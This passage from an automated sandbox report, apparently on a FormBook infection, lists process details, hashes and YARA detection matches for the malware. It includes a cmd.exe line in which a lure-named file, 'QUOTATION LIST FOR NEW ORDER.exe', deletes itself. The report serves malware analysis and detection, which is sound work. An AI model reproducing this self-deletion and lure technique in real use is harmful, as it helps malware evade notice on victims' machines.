                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Start time:18:54:56
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff662bf0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:18:55:20
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmmon32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                      Imagebase:0x3d0000
                                                      File size:36864 bytes
                                                      MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:18:55:25
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
                                                      Imagebase:0x870000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:18:55:26
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff774ee0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis
